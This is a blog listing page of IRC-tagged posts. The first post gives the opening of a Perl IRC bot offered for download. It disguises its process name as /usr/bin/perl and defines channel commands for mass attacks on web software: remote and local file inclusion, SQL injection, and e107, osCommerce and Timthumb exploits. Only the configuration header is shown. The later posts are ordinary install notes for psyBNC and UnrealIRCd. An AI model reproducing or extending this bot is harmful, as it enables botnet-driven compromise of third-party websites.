Showing posts with label IRC. Show all posts
Showing posts with label IRC. Show all posts
Wednesday, January 16, 2013
Boot perl Multi (tim,osco,e107,sql dll )
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $datetime = localtime;
my $fakeproc = "/usr/bin/perl";
my $ircserver = "irc.server.org";
my $ircport = "6667";
my $nickname = "DJok";
my $ident = "wantexz";
my $channel = "#wantexz";
my $admin = "wantexz";
my $fullname = "wantexz";
my $zenlogo = " 15( 4@ 12zen 15)";
my $lfilogo = " 15( 4@ 12LFI 15)";
my $rfilogo = " 15( 4@ 12RFI 15)";
my $e107logo = " 15( 4@ 12E107 15)";
my $xmllogo = " 15( 4@ 12XML 15)";
my $sqllogo = " 15( 4@ 12SQL 15)";
my $oscologo = " 15( 4@ 12OsCo 15)";
my $timologo = " 15( 4@ 12Timthumb 15)";
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $xmlcmd = '!xml';
my $zencmd = '!zen';
my $sqlcmd = '!sql';
my $e107cmd = '!e107';
my $oscocmd = '!osc';
my $timcmd = '!tim';
my $cmdxml = '!cmdxml';
my $cmdlfi = '!cmdlfi';
my $cmde107 = '!cmde107';
Download
Saturday, September 15, 2012
Install psybnc
Install psybnc
Maybe it's a lot of tutoring on how to install psybnc:
here I will share installation psybnc and also as a record for me snediri too.
The first entry into our machine shell
then
we wget http://www.psybnc.net/psyBNC-2.3.2-7.tar.gz
after that extract the files above:
tar-zxvf psyBNC-2.3.2-7.tar.gz
install Unreal IRCd
How to install Unreal 3.2.7 IRCd
Welcome to the Tolerant Solutions installation guide for installing
the Unreal 3.2.7 IRCd on our shell servers. To retrieve the latest
version of the Unreal IRC daemon-- you can connect to our public FTP
server:
wget ftp://ftp.tolerant.ca/pub/ircd/Unreal3.2.7.tar.gz
Subscribe to:
Posts (Atom)